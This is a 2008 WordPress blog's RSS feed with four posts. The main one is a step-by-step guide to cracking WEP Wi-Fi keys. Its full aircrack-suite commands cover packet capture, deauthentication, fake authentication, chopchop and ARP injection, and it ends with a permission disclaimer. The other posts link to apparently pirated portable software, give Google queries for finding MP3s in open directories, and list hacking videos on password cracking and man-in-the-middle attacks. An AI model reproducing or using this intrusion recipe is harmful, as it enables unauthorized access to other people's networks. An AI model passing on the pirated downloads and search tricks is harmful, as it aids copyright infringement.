<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>My Dashboard</title>
	<atom:link href="http://redglue.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://redglue.wordpress.com</link>
	<description>Just another WordPress.com weblog</description>
	<lastBuildDate>Sat, 10 May 2008 00:05:48 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='redglue.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/81b8491fbcc96016995c6dc3dfbb22c1?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>My Dashboard</title>
		<link>http://redglue.wordpress.com</link>
	</image>
			<item>
		<title>Cracking WEP: The ultimate guide</title>
		<link>http://redglue.wordpress.com/2008/05/10/cracking-wep-the-ultimate-guide/</link>
		<comments>http://redglue.wordpress.com/2008/05/10/cracking-wep-the-ultimate-guide/#comments</comments>
		<pubDate>Sat, 10 May 2008 00:05:48 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Hack]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=16</guid>
		<description><![CDATA[1. Download BackTrack (http://www.remote-exploit.org/index.php/BackTrack_Downloads)
2. Install BackTrack to your hd or just boot the live cd (username: root, password: toor; Don’t froget to start the gui: type in startx on the command lien after logging in).
3. Start up a terminal and set your wireless interface in monitor mode.
iwconfig [wireless interface] mode monitor
* to find out what [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=16&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>1. Download BackTrack (http://www.remote-exploit.org/index.php/BackTrack_Downloads)</p>
<p>2. Install BackTrack to your hd or just boot the live cd (username: root, password: toor; Don’t froget to start the gui: type in startx on the command lien after logging in).</p>
<p>3. Start up a terminal and set your wireless interface in monitor mode.</p>
<blockquote><p>iwconfig [wireless interface] mode monitor</p></blockquote>
<blockquote><p>* to find out what your wireless interface is, type iwconfig and press enter. All interfaces will show up (mine is ath0).</p>
<p>4. Start airodump by typing in the terminal (press enter after typing it in)</p></blockquote>
<blockquote><p>airodump-ng –ivs -w capture [wireless interface]</p></blockquote>
<blockquote><p>5. When airodump found the network you want to hack it’ll show up. Note the BSSID (acces point’s mac address) and the SSID (the access point’s name). Don’t close this terminal window or stop airodump from running before you have the wep key!</p></blockquote>
<blockquote><p>##### Generating data, method one: There are clients visible in airodump associated to the network #####</p></blockquote>
<blockquote><p>1. Open a new terminal window and type in (press enter after typing in):</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06</p></blockquote>
<blockquote><p>2. Open another new terminal window and type in (press enter after typing in):</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –deauth 10 -a [the client’s MAC adress]</p></blockquote>
<blockquote><p>3. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.</p></blockquote>
<blockquote><p>##### Generating data, method two: There are NO clients visible in airodump associated to the network #####</p></blockquote>
<blockquote><p>1. Open a new terminal window and type in (do NOT press the enter button!)</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06</p></blockquote>
<blockquote><p>2. Open another new terminal window and type in (do NOT press the enter button!):</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06</p></blockquote>
<blockquote><p>3. Press enter in the fakeauth terminal and after it started to fakeauth, press enter as quickly as possible in the arpreplay window.</p></blockquote>
<blockquote><p>3. Open another new terminal window and type in (press enter after typing in):</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –deauth 10 -a 01:02:03:04:05:06</p></blockquote>
<blockquote><p>4. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.</p>
<p>##### If the above two methods aren’t working, try this #####</p>
<p>1. Open a new terminal window and type in (press the enter button after typing it in):</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06</p></blockquote>
<blockquote><p>2. Open another new terminal window and type in (press the enter button after typing it in):</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –chopchop -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06</p></blockquote>
<blockquote><p>3. The chopchop starts reading packages. When it finds one, it’ll ask you to use it. Choose yes. Wait a few seconds/minutes and remember the filename that is given to you at the end.</p>
<p>4. Open Ethereal (click the icon in the bottom left corner &gt; Backtrack &gt; Sniffers &gt; Ethereal) and open the xor file made with the chopchop attack in Ethereal (it’s located in the home folder)</p>
<p>5. Look with Ethereal in the captured file. Try to find the source ip and the destination ip: write those addresses down somewhere.</p>
<p>6. open a terminal and type in (press enter after typing in):</p></blockquote>
<blockquote><p>arpforge-ng [the name of the xor file from the chopchop attack] 1 [the BSSID you found wth airodump] 01:02:03:04:05:06 [the source ip] [the destination ip] arp.cap</p></blockquote>
<blockquote><p>7. In a new or in the same terinal window, type in (and press enter):</p></blockquote>
<blockquote><p>aireplay-ng -2 ath0 -r arp.cap</p></blockquote>
<blockquote><p>5. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.</p>
<p>##### The actual cracking of the WEP key #####</p>
<p>1. Open a new terminal window and type in</p></blockquote>
<blockquote><p>airecrack-ng -n 64 capture-01.ivs (for a 64 bits encryption, enter after typing)</p></blockquote>
<blockquote><p>or</p></blockquote>
<blockquote><p>airecrack-ng -n 128 capture-01.ivs (for a 128 bits encryption, enter after typing)</p></blockquote>
<blockquote><p>If you don’t know how strong the encryption is, type in both in different terminals and start a third terminal. Type in this code:</p></blockquote>
<blockquote><p>airecrack-ng capture-01.ivs</p></blockquote>
<blockquote><p>2. Wait a few minutes. Check the terminal(s). The code will automaticly show up if found. Keep airodump running!<br />
DISLAIMER:I don’t think I have to mention that you need written permission from the owner of the network before you are allowed to start cracking his wep or even before you are allowed to capture packages. Just try it with your own network. You’ll learn a lot about it. But never ever try it with another network than your own.</p></blockquote>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/16/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/16/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/16/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=16&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/10/cracking-wep-the-ultimate-guide/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>
	</item>
		<item>
		<title>some portables apps</title>
		<link>http://redglue.wordpress.com/2008/05/09/some-portables-apps/</link>
		<comments>http://redglue.wordpress.com/2008/05/09/some-portables-apps/#comments</comments>
		<pubDate>Fri, 09 May 2008 23:37:17 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=15</guid>
		<description><![CDATA[http://rapidshare.com/files/58784897/WinAvi_Video_Converter_7.7_Portable.exe
http://rapidshare.com/files/58784914/Yahoo_Messenger_7.5_Portable.exe
http://rapidshare.com/files/58784922/7zip_4.42_Portable.exe
http://rapidshare.com/files/58785112/Alcohol_120__1.9.5.3823_Portable.exe
http://rapidshare.com/files/58785170/Audio_Edit_Magic_9.21_Portable.exe
http://rapidshare.com/files/58786783/AVG_Anti_Virus_7.5_Portable.exe
http://rapidshare.com/files/58786975/CloneDVD2_2.8.9.5_Portable.exe
http://rapidshare.com/files/58787393/dBpowerAmp_11.5_Portable.exe
http://rapidshare.com/files/58787925/Everest_Ultimate_2006.exe
http://rapidshare.com/files/58788898/FireFox_2.0_Portable.exe
http://rapidshare.com/files/58789605/IncrediMail_v5.3.1_Build_2750.exe
http://rapidshare.com/files/58790721/IrfanView_3.99_Portable.exe
http://rapidshare.com/files/58791589/Kaspersky_AntiVirus_6.0.1.41_Portable.exe
http://rapidshare.com/files/58791959/Msn_7.5_Portable.exe
http://rapidshare.com/files/58792017/Multi_Password_Recovery_0.2.6_Portable.exe
http://rapidshare.com/files/58792673/Nero_7.2.0.3b_Portable.exe
http://rapidshare.com/files/58792703/Paragon_Drive_BackUp_6.01.041_Portable.exe
http://rapidshare.com/files/58793168/Partition_Magic_8_Portable.exe
http://rapidshare.com/files/58794763/Partition_Manager_8.0_Pro_Portable.exe
http://rapidshare.com/files/58795216/Port_APMS_6.0.4.exe
http://rapidshare.com/files/58795641/Portable_Driver_Genius_2006_6.1.2518.exe
http://rapidshare.com/files/58796214/Portable_RealDRAW.exe
http://rapidshare.com/files/58796293/Super_Internet_TV_6.8.0.0_Portable.exe
http://rapidshare.com/files/58796630/TMPGEnc_MPEG_Editor_1.0.1.59_Portable.exe
http://rapidshare.com/files/58796662/UltraExplorerSetup.exe
http://rapidshare.com/files/58796667/UltraISO_Premium_Edition_8.6.0_Build_1936_Portable.exe
http://rapidshare.com/files/58796671/UninstallTool_1.6.6.exe
http://rapidshare.com/files/58796709/VideoLan_0._8.5r.2_Portable.exe
http://rapidshare.com/files/58796723/WinAuditu.exe
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=15&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><a href="http://rapidshare.com/files/58784897/WinAvi_Video_Converter_7.7_Portable.exe" target="_blank">http://rapidshare.com/files/58784897/WinAvi_Video_Converter_7.7_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58784914/Yahoo_Messenger_7.5_Portable.exe" target="_blank">http://rapidshare.com/files/58784914/Yahoo_Messenger_7.5_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58784922/7zip_4.42_Portable.exe" target="_blank">http://rapidshare.com/files/58784922/7zip_4.42_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58785112/Alcohol_120__1.9.5.3823_Portable.exe" target="_blank">http://rapidshare.com/files/58785112/Alcohol_120__1.9.5.3823_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58785170/Audio_Edit_Magic_9.21_Portable.exe" target="_blank">http://rapidshare.com/files/58785170/Audio_Edit_Magic_9.21_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58786783/AVG_Anti_Virus_7.5_Portable.exe" target="_blank">http://rapidshare.com/files/58786783/AVG_Anti_Virus_7.5_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58786975/CloneDVD2_2.8.9.5_Portable.exe" target="_blank">http://rapidshare.com/files/58786975/CloneDVD2_2.8.9.5_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58787393/dBpowerAmp_11.5_Portable.exe" target="_blank">http://rapidshare.com/files/58787393/dBpowerAmp_11.5_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58787925/Everest_Ultimate_2006.exe" target="_blank">http://rapidshare.com/files/58787925/Everest_Ultimate_2006.exe</a><br />
<a href="http://rapidshare.com/files/58788898/FireFox_2.0_Portable.exe" target="_blank">http://rapidshare.com/files/58788898/FireFox_2.0_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58789605/IncrediMail_v5.3.1_Build_2750.exe" target="_blank">http://rapidshare.com/files/58789605/IncrediMail_v5.3.1_Build_2750.exe</a><br />
<a href="http://rapidshare.com/files/58790721/IrfanView_3.99_Portable.exe" target="_blank">http://rapidshare.com/files/58790721/IrfanView_3.99_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58791589/Kaspersky_AntiVirus_6.0.1.41_Portable.exe" target="_blank">http://rapidshare.com/files/58791589/Kaspersky_AntiVirus_6.0.1.41_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58791959/Msn_7.5_Portable.exe" target="_blank">http://rapidshare.com/files/58791959/Msn_7.5_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58792017/Multi_Password_Recovery_0.2.6_Portable.exe" target="_blank">http://rapidshare.com/files/58792017/Multi_Password_Recovery_0.2.6_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58792673/Nero_7.2.0.3b_Portable.exe" target="_blank">http://rapidshare.com/files/58792673/Nero_7.2.0.3b_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58792703/Paragon_Drive_BackUp_6.01.041_Portable.exe" target="_blank">http://rapidshare.com/files/58792703/Paragon_Drive_BackUp_6.01.041_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58793168/Partition_Magic_8_Portable.exe" target="_blank">http://rapidshare.com/files/58793168/Partition_Magic_8_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58794763/Partition_Manager_8.0_Pro_Portable.exe" target="_blank">http://rapidshare.com/files/58794763/Partition_Manager_8.0_Pro_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58795216/Port_APMS_6.0.4.exe" target="_blank">http://rapidshare.com/files/58795216/Port_APMS_6.0.4.exe</a><br />
<a href="http://rapidshare.com/files/58795641/Portable_Driver_Genius_2006_6.1.2518.exe" target="_blank">http://rapidshare.com/files/58795641/Portable_Driver_Genius_2006_6.1.2518.exe</a><br />
<a href="http://rapidshare.com/files/58796214/Portable_RealDRAW.exe" target="_blank">http://rapidshare.com/files/58796214/Portable_RealDRAW.exe</a><br />
<a href="http://rapidshare.com/files/58796293/Super_Internet_TV_6.8.0.0_Portable.exe" target="_blank">http://rapidshare.com/files/58796293/Super_Internet_TV_6.8.0.0_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58796630/TMPGEnc_MPEG_Editor_1.0.1.59_Portable.exe" target="_blank">http://rapidshare.com/files/58796630/TMPGEnc_MPEG_Editor_1.0.1.59_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58796662/UltraExplorerSetup.exe" target="_blank">http://rapidshare.com/files/58796662/UltraExplorerSetup.exe</a><br />
<a href="http://rapidshare.com/files/58796667/UltraISO_Premium_Edition_8.6.0_Build_1936_Portable.exe" target="_blank">http://rapidshare.com/files/58796667/UltraISO_Premium_Edition_8.6.0_Build_1936_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58796671/UninstallTool_1.6.6.exe" target="_blank">http://rapidshare.com/files/58796671/UninstallTool_1.6.6.exe</a><br />
<a href="http://rapidshare.com/files/58796709/VideoLan_0._8.5r.2_Portable.exe" target="_blank">http://rapidshare.com/files/58796709/VideoLan_0._8.5r.2_Portable.exe</a><br />
<a href="http://rapidshare.com/files/58796723/WinAuditu.exe" target="_blank">http://rapidshare.com/files/58796723/WinAuditu.exe</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/15/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/15/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/15/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=15&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/09/some-portables-apps/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>
	</item>
		<item>
		<title>Google Hack to Search MP3</title>
		<link>http://redglue.wordpress.com/2008/05/09/google-hack-to-search-mp3/</link>
		<comments>http://redglue.wordpress.com/2008/05/09/google-hack-to-search-mp3/#comments</comments>
		<pubDate>Fri, 09 May 2008 23:23:17 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Hack]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=14</guid>
		<description><![CDATA[Note :
[Directory String]
- “index of”
- “last modified”
- “parent of”
[File Type]
- “mo3″
- “wma”
- “shn”
[MP3 Name]
- Nama Album
- Nama Artis
- Judul Lagu
- Creativitas User 
[Limitors]
-html -htm -php -asp -txt -pls
Format Stringnya :
1.   [Directory String] + (inurl:)[file type] + [mp3 name]
2.   [Directory String] + (intitle:)[file type] + [mp3 name]
3.   [Directory String] + [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=14&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Note :<br />
[Directory String]<br />
- “index of”<br />
- “last modified”<br />
- “parent of”</p>
<p>[File Type]<br />
- “mo3″<br />
- “wma”<br />
- “shn”</p>
<p>[MP3 Name]<br />
- Nama Album<br />
- Nama Artis<br />
- Judul Lagu<br />
- Creativitas User <img class="wp-smiley" src="http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif" alt=")" /></p>
<p>[Limitors]<br />
-html -htm -php -asp -txt -pls</p>
<p>Format Stringnya :<br />
1.   [Directory String] + (inurl:)[file type] + [mp3 name]<br />
2.   [Directory String] + (intitle:)[file type] + [mp3 name]<br />
3.   [Directory String] + [file type] + [mp3 name] + [limitors]<br />
4.   intitle:index.of + mp3 + “grandaddy” -html -htm -php -asp apache feb-2005<br />
5.   intitle:index.of + mp3 + “grandaddy” -html -htm -php -asp apache 2005<br />
6.   intitle:index.of + mp3 + -html -htm -php -asp apache mar<br />
7.   “xitami web server” + (inurl:)[file type] + [mp3 name]<br />
8.   “xitami web server” + (intitle:)[file type] + [mp3 name]<br />
9.   “directory listings” + (inurl:)[file type] + [mp3 name]<br />
10. “directory listings of” + (inurl:)[file type] + [mp3 name]<br />
11. “directory listings of” + (intitle:)[file type] + [mp3 name]<br />
12. [mp3 name].mp3 -playlist -filetype:txt</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/14/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/14/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/14/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=14&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/09/google-hack-to-search-mp3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>

		<media:content url="http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif" medium="image">
			<media:title type="html">)</media:title>
		</media:content>
	</item>
		<item>
		<title>Hacking WEP Wireless</title>
		<link>http://redglue.wordpress.com/2008/05/09/hacking-wep-wireless/</link>
		<comments>http://redglue.wordpress.com/2008/05/09/hacking-wep-wireless/#comments</comments>
		<pubDate>Fri, 09 May 2008 23:19:15 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Hack]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=13</guid>
		<description><![CDATA[Download video tutorial hacking WEP wireless
128 Bit Wep Cracking With Injection!.swf
http://rapidshare.com/files/31477043/hv1.rar
A Penetration Attack Reconstructed.avi
http://rapidshare.com/files/31480758/hv2.rar
A Quick and Dirty Intro to Nessus using the Auditor Boot CD!.swf
http://rapidshare.com/files/31481861/hv3.rar
Adding Modules to a Slax or Backtrack Live CD from Windows.swf
http://rapidshare.com/files/31482388/hv4.rar
Airplay replay attack &#8211; no wireless client required.swf
http://rapidshare.com/files/31482894/hv5.rar
Anonym.OS LiveCD with build in Tor Onion routing and Privoxy.swf
http://rapidshare.com/files/31483265/hv6.rar
BackTrack LiveCD to HD Installation [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=13&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Download video tutorial hacking WEP wireless</p>
<p>128 Bit Wep Cracking With Injection!.swf<br />
<a href="http://rapidshare.com/files/31477043/hv1.rar" target="_blank">http://rapidshare.com/files/31477043/hv1.rar</a></p>
<p>A Penetration Attack Reconstructed.avi<br />
<a href="http://rapidshare.com/files/31480758/hv2.rar">http://rapidshare.com/files/31480758/hv2.rar</a></p>
<p>A Quick and Dirty Intro to Nessus using the Auditor Boot CD!.swf<br />
<a href="http://rapidshare.com/files/31481861/hv3.rar" target="_blank">http://rapidshare.com/files/31481861/hv3.rar</a></p>
<p>Adding Modules to a Slax or Backtrack Live CD from Windows.swf<br />
<a href="http://rapidshare.com/files/31482388/hv4.rar" target="_blank">http://rapidshare.com/files/31482388/hv4.rar</a></p>
<p>Airplay replay attack &#8211; no wireless client required.swf<br />
<a href="http://rapidshare.com/files/31482894/hv5.rar">http://rapidshare.com/files/31482894/hv5.rar</a></p>
<p>Anonym.OS LiveCD with build in Tor Onion routing and Privoxy.swf<br />
<a href="http://rapidshare.com/files/31483265/hv6.rar" target="_blank">http://rapidshare.com/files/31483265/hv6.rar</a></p>
<p>BackTrack LiveCD to HD Installation Instruction Video.swf<br />
<a href="http://rapidshare.com/files/31483709/hv7.rar" target="_blank">http://rapidshare.com/files/31483709/hv7.rar</a></p>
<p>Basic Nmap Usage!.swf<br />
<a href="http://rapidshare.com/files/31484459/hv8.rar" target="_blank">http://rapidshare.com/files/31484459/hv8.rar</a></p>
<p>Basic Tools for Wardriving!.swf<br />
<a href="http://rapidshare.com/files/31485447/hv9.rar" target="_blank">http://rapidshare.com/files/31485447/hv9.rar</a></p>
<p>Bluesnarfer attack tool demonstration.swf<br />
<a href="http://rapidshare.com/files/31486249/hv10.rar" target="_blank">http://rapidshare.com/files/31486249/hv10.rar</a></p>
<p>Bluesnarfing a Nokia 6310i hand set.avi<br />
<a href="http://rapidshare.com/files/31486983/hv11.rar" target="_blank">http://rapidshare.com/files/31486983/hv11.rar</a></p>
<p>Breaking WEP in 10 minutes.avi<br />
<a href="http://rapidshare.com/files/31489615/hv12.rar" target="_blank">http://rapidshare.com/files/31489615/hv12.rar</a></p>
<p>Cain to ARP poison and sniff passwords!.avi<br />
<a href="http://rapidshare.com/files/31489735/hv13.rar" target="_blank">http://rapidshare.com/files/31489735/hv13.rar</a></p>
<p>Complete Hacking Video using Metasploit &#8211; Meterpreter.swf<br />
<a href="http://rapidshare.com/files/31490690/hv14.rar" target="_blank">http://rapidshare.com/files/31490690/hv14.rar</a></p>
<p>Cracking a 128 bit WEP key (Auditor).swf<br />
<a href="http://rapidshare.com/files/31496176/hv15.rar" target="_blank">http://rapidshare.com/files/31496176/hv15.rar</a></p>
<p>Cracking a 128 Bit Wep key + entering the cridentials.swf<br />
<a href="http://rapidshare.com/files/31498043/hv16.rar" target="_blank">http://rapidshare.com/files/31498043/hv16.rar</a></p>
<p>Cracking Syskey and the SAM on Windows Using Samdump2 and John!.swf<br />
<a href="http://rapidshare.com/files/31498481/hv17.rar" target="_blank">http://rapidshare.com/files/31498481/hv17.rar</a></p>
<p>Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!.swf<br />
<a href="http://rapidshare.com/files/31499002/hv18.rar" target="_blank">http://rapidshare.com/files/31499002/hv18.rar</a></p>
<p>Cracking WPA Networks (Auditor).swf<br />
<a href="http://rapidshare.com/files/31500300/hv19.rar" target="_blank">http://rapidshare.com/files/31500300/hv19.rar</a></p>
<p>DoS attack against Windows FTP Server &#8211; DoS.avi<br />
<a href="http://rapidshare.com/files/31501194/hv20.rar" target="_blank">http://rapidshare.com/files/31501194/hv20.rar</a></p>
<p>Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools!.swf<br />
<a href="http://rapidshare.com/files/31501876/hv21.rar" target="_blank">http://rapidshare.com/files/31501876/hv21.rar</a></p>
<p>Exploiting some bugs of tools used in Windows.swf<br />
<a href="http://rapidshare.com/files/31504093/hv22.rar" target="_blank">http://rapidshare.com/files/31504093/hv22.rar</a></p>
<p>Exploiting weaknesses of PPTP VPN (Auditor).swf<br />
<a href="http://rapidshare.com/files/31505446/hv23.rar" target="_blank">http://rapidshare.com/files/31505446/hv23.rar</a></p>
<p>Finding Rogue SMB File Shares On Your Network!.swf<br />
<a href="http://rapidshare.com/files/31505931/hv24.rar" target="_blank">http://rapidshare.com/files/31505931/hv24.rar</a></p>
<p>Fun with Ettercap Filters!.swf<br />
<a href="http://rapidshare.com/files/31506167/hv25.rar" target="_blank">http://rapidshare.com/files/31506167/hv25.rar</a></p>
<p>How to crack the local windows passwords in the SAM database.swf<br />
<a href="http://rapidshare.com/files/31506295/hv26.rar" target="_blank">http://rapidshare.com/files/31506295/hv26.rar</a></p>
<p>How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor).swf<br />
<a href="http://rapidshare.com/files/31509029/hv27.rar" target="_blank">http://rapidshare.com/files/31509029/hv27.rar</a></p>
<p>How to sniff around switches using Arpspoof and Ngrep!.avi<br />
<a href="http://rapidshare.com/files/31512416/hv28.rar" target="_blank">http://rapidshare.com/files/31512416/hv28.rar</a></p>
<p>Install VNC Remotely!.avi<br />
<a href="http://rapidshare.com/files/31512417/hv29.rar" target="_blank">http://rapidshare.com/files/31512417/hv29.rar</a></p>
<p>Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res).avi<br />
<a href="http://rapidshare.com/files/31512418/hv30.rar" target="_blank">http://rapidshare.com/files/31512418/hv30.rar</a></p>
<p>Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res).avi<br />
<a href="http://rapidshare.com/files/31514267/hv31.rar" target="_blank">http://rapidshare.com/files/31514267/hv31.rar</a></p>
<p>John The Ripper 1.7 password cracker Installation Instruction Video.swf<br />
